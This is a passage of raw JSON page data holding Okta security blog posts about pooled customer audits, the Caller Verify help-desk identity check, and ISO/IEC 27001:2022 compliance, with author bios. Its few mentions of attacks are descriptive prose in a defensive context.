strain of one-to-one, repetitive audits. Our customers are at the heart of everything we do. It is important to highlight how Okta builds trust by demonstrating our robust security. As Okta continues to grow and is now considered a critical outsource provider, this pooled audit model is helping more customers meet regulatory obligations. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Deeper collaboration and shared insights\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our program introduces a change from the standard private audit model by introducing opportunities to engage with industry peers and share learnings. Okta’s in-person audit setting helps support the fostering of new connections and strengthening existing relationships, enabling a forum to share best practices and gain invaluable insights from both Okta and pooled audit participants.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Proactivity versus reactivity\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"While these new regulations don't directly impact Okta, we take a proactive approach by engaging our customers directly when new regulations emerge. By helping them understand how Okta's security controls apply and effectively address new requirements, we can support them in their compliance adherence efforts.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Measuring What Matters\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-1\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Measuring the success of pooled audit programs not only gives our security team and leadership insight into what is driving concerns for customers, but also how we can improve future sessions.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Most recently,\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" 90%\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" of APRA pooled audit participants reported high program effectiveness, and \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"94% \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"reported increased confidence in Okta as a security partner. Our program’s mandate is to build lasting trust and strengthen partnerships. Here’s what our customers are saying about us:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"“I like the concept of the pooled audit. It was good to have the Okta team outline the control environment to help us to complete our obligation requirements. It was good to connect with other customers that are in similar positions.” - Senior Manager at a global financial services company\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"“The information sharing was open and questions were answered well and comprehensively.” - Technology Risk Manager at a globally recognized financial services company\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"“Okta/Auth0 is a key service provider for our business services. It was good to understand the security controls and evidence shown in the pooled audit which demonstrates the security posture and maturity across Okta/Auth0.” - Head of Security Strategy and Architecture at a global retail payment company\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"“The openness of Okta in sharing information has supported our compliance journey. The session allowed us to get better insights and comfort around how a key partner is ensuring the security and continuity of services to its customers. Opening discussion and being able to gain clarification directly from senior leaders.” - Senior Operational Risk Manager at a global retail payment company\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"“The face-to-face engagement was excellent, and Okta's collaborative approach was a significant benefit. We feel it's truly important to foster this trusted relationship and to continue growing more secure together\\\" – EU Customer \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our Future Vision\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-1\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We’re focused on continuing to expand our Customer Audit program across new industries and regions, opening the program benefits to additional customers outside of Financial Services. We believe a world-leading SaaS identity service can support their success. We’re committed to supporting our customers through the evolving and complex regulatory landscape they face.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This journey toward scalable assurance is bigger than Okta. We’re calling on our peers in the security SaaS community to join in on these efforts. Are you exploring pooled audits or similar collaborative models? Reach out at \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"mailto:customertrust@asqula.com\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"customeraudit@asqula.com\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" to collaborate on audit-based insights and accelerate the industry's progress for all customers. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"By openly sharing our collective expertise and challenges, we can create a more trusted, secure ecosystem for everyone. We welcome your feedback and partnership as we build this new standard, together.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"}},{"updatedAt":"2025-06-18T17:25:51.381Z","slug":"/articles/2025/06/building-confidence-in-support-comms-with-caller-verify-at-okta","node_locale":"en","date":"2025-06-18T00:00","secAuthor":[{"name":"Carmen Girardin","slug":"/hackers/carmen-girardin","jobTitle":"Manager, Security Communications","id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"Carmen Girardin is a Manager, Security Communications at Okta. Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. Carmen spends her downtime traveling, thrifting for treasures and reading.
"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#b8b8b8","width":58,"height":58}}}],"title":"Building Confidence in Support Comms with Caller Verify at Okta","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"The days when the name of your childhood best friend or your first car model provided enough assurance to validate your identity are long gone. That’s where Caller Verify can help."},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In many of the most impactful incidents of the past two years, attackers gained privileged access to systems by tricking IT support personnel into resetting the passwords and MFA factors of system administrators.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Armed with access to privileged accounts, attackers were able to expand their access further by accessing directories of hashed passwords (NTDS.dit) stored in every Microsoft Active Directory environment. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In most organizations, the challenge is how to validate the identity of callers to internal help desks or other technical teams before performing user lifecycle events. The days when the name of your childhood best friend or your first car model provided enough assurance to validate your identity are long gone.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"So, when an employee does call for help, how do technical support personnel validate with confidence that the caller on the line is who they say they are? These processes need to be revisited, especially given recent advances in “deepfake” technology.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"That’s where Caller Verify can help.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"What is Caller Verify?\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.callerverify.com/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Caller Verify\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" is an application that enables IT support to extend the multi-factor authentication prompts available via Okta Verify to quickly and securely verify the identity of inbound callers. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Caller Verify is a third-party developed application awarded Okta’s \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.asqula.com/blog/2024/10/okta-partner-awards-celebrating-our-2024-partner-award-winners/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"\\\"2024 AMER Rising Star Partner of the Year” winner\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". It can integrate with ITSM and CRM solutions, such as ServiceNow or Salesforce, to require that all inbound callers satisfy an MFA challenge before a support ticket is unlocked for use.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Caller Verify is compliant with the following regulations:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.osfi-bsif.gc.ca/en/guidance/guidance-library/technology-cyber-risk-management\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Office of the Superintendent of Financial Institutions (OSFI) Guideline B-13 Technology and Cyber Risk Management\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", subsection 3.2.7 Defend\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.hhs.gov/hipaa/for-professionals/privacy/laws-regulations/index.html\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Health Insurance Portability and Accountability (HIPAA)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" Security Rule, 45 CFR § 164.308(a)(1)(ii)(D)\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.pcisecuritystandards.org/standards/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Payment Card Industry Data Security Standard (PCI DSS)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Requirement 7.1\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://gdpr-info.eu/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"General Data Protection Regulation (GDPR)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Article 32\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63-3.html\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"National Institute of Standards and Technology (NIST)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", Level 3\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This solution allows Okta IT admins to enhance our employee experience with a timely response to confident, authenticated communications. By sending a prompt to the caller using Okta Verify, the technical support team can validate the caller’s identity before providing any level of assistance, protecting both the organization and the user.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta’s Use Case\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta integrated Caller Verify into various IT support processes well over 12 months ago. Our use of Caller Verify ensures that only authorized employees can ask IT support to perform sensitive operations that involve an Okta account.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In line with Okta’s \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.asqula.com/fr-fr/newsroom/press-releases/introducing-the-okta-secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"ongoing commitment \",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\"to hardening our corporate infrastructure, Okta requires that users satisfy all authentication challenges using phishing-resistant authentication methods (such as FastPass with an Okta Verify-enrolled device, or a registered Yubikey), including the challenges required to open a support request.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Stay secure\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Caller Verify plays an important role in Okta’s end-to-end ability to protect all enrollment, authentication and recovery flows with phishing-resistant authentication. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To learn about Okta’s use of ID Verification to secure enrollment and recovery, read on for \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/02/how-okta-embraces-identity-verification-using-persona/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"how we leverage Okta’s integration with Persona\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"}},{"updatedAt":"2025-06-19T20:55:40.460Z","slug":"/articles/2025/06/enabling-iso27001-compliance-with-okta","node_locale":"en","date":"2025-06-04T00:00","secAuthor":[{"name":"Gemma Parkes","slug":"/hackers/gemma-parkes","jobTitle":"Security Assurance Analyst","id":"5d49800b-59a6-5c33-b25f-79ad8ce4b228","bio":{"bio":"Gemma Parkes is a Security Assurance Analyst in the EMEA region at Okta. The Customer Assurance team within Security Trust & Culture supports Okta’s growing customer base with inquiries pertaining to security and compliance. Working within the defence and aerospace industry, then moving to global corporations supporting public and private sector customers, Gemma has gained extensive experience in implementing and managing security frameworks and associated security practices. Backed by over 20 years of experience in security governance, risk management, and compliance, she now enjoys working collaboratively to provide strategic support to Okta’s customers and prospects. In her downtime, Gemma enjoys spending time with her family and going to the theatre.
"},"image":{"gatsbyImageData":{"images":{"sources":[{"srcSet":"https://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=15&h=15&q=50&fm=webp 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=29&h=29&q=50&fm=webp 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=58&h=58&q=50&fm=webp 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=116&h=116&q=50&fm=webp 116w","sizes":"(min-width: 58px) 58px, 100vw","type":"image/webp"}],"fallback":{"src":"https://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=58&h=58&fl=progressive&q=50&fm=jpg","srcSet":"https://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=15&h=15&fl=progressive&q=50&fm=jpg 15w,\nhttps://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=29&h=29&fl=progressive&q=50&fm=jpg 29w,\nhttps://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=58&h=58&fl=progressive&q=50&fm=jpg 58w,\nhttps://images.ctfassets.net/kbkgmx9upatd/72371NQTWgpIwHGlXAbBFm/65d38c0248e2e8fc500f71cc18a3ce33/Gemma_Parkes_Headshot.jpeg?w=116&h=116&fl=progressive&q=50&fm=jpg 116w","sizes":"(min-width: 58px) 58px, 100vw"}},"layout":"constrained","backgroundColor":"#a89878","width":58,"height":58}}}],"title":"Enabling ISO/IEC 27001:2022 Compliance with Okta","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"summary":{"summary":"ISO/IEC 27001 is a globally recognized security standard. This blog introduces a new Factsheet that provides guidance on how Okta can support organizations of any size in achieving or maintaining compliance to the ISO/IEC 27001:2022 standard."},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ISO/IEC 27001 continues to be a globally recognized security standard and a consistently popular choice for today’s organizations seeking to demonstrate robust security controls and the effectiveness of their Information Security Management Systems (ISMS). This blog introduces a new Factsheet that provides guidance on how Okta can support organizations of any size in achieving or maintaining compliance to the ISO/IEC 27001:2022 standard.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is ISO/IEC 27001:2022?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ISO/IEC 27001 is an international standard for information security management. It provides a framework for organizations to follow to establish, implement, monitor, and maintain an effective Information Security Management System (ISMS). The standard consists of security controls, which are divided into groups of:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Organizational, \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"People,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Physical, and \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technological controls.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The 2022 iteration of the standard introduced “Operational Capabilities” such as Identity and Access Management (IAM). By implementing applicable IAM controls in an organization’s environment, it can be demonstrated that best practices are being followed for securing information, data, and assets.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Okta supports compliance to ISO/IEC 27001:2022\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Auth0 are ISO27001:2022-compliant. Our platforms can also support organizations in achieving or maintaining their compliance to the ISO/IEC 27001:2022 standard. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To guide our customers on how Okta can support, we’ve recently released a helpful new resource: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/?itemUid=6217dabc-952b-4163-b19b-8372a8de7d4d&source=click\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"The ISO/IEC 27001:2022 Compliance with Okta Platform Factsheet\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". This Factsheet provides an overview of ISO27001’s benefits and a detailed summary of how Okta’s products provide a unified approach in compliance adherence to IAM-specific and other controls. Keeping our customers in mind, we’ve methodically documented our guidance in three key sections:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Okta Supports IAM Controls\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How Okta Supports Non-IAM Specific Controls\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ISO/IEC 27001:2022 Reporting Requirements\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Each section is strategically mapped to Okta products that support adhering to the controls, as presented. Leveraging the control guidance of the Factsheet can benefit all Okta customers, even organizations not currently targeting adherence to these controls.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More on Compliance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta upholds a strong compliance framework to demonstrate our commitment to maintaining highly available, secure, and resilient products and services. Many of these controls are embedded in Okta’s business-as-usual activities. We invite you to visit our new Factsheet, as well as our latest independent audit reports and other security compliance-related documents on our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"For more information on accessing Okta's Security Trust Center, visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.asqula.com/help/s/article/accessing-okta-s-security-trust-center?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Trust Center\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and all available documentation is accessible to customers and prospects of Okta. Site visitors can view Okta’s certifications and access industry-standard questionnaires. To learn more about our efforts, read our blog article, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/03/empowering-security-with-customer-trust-solutions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Empowering Security with Customer Trust Solutions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Keep watching as we publish additional helpful resources; more to come.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Disclaimer: While this article discusses certain legal concepts, it does not constitute legal advice. It is provided for informational purposes only. For legal advice regarding your organization's compliance needs, please consult your organization's legal department. Okta makes no representations, warranties, or other assurances regarding the content of this article. Information regarding Okta's contractual assurances to its customers can be found at \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"http://asqula.com/agreements\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"asqula.com/agreements\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"}},{"updatedAt":"2025-05-28T16:02:25.114Z","slug":"/articles/2025/05/oktas-secure-by-design-pledge-one-year-on","node_locale":"en","date":"2025-05-22T00:00","secAuthor":[{"name":"David Bradbury","slug":"david-bradbury","jobTitle":"Chief Security Officer","id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies.
\n\nPrior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs.
\n\nBradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.
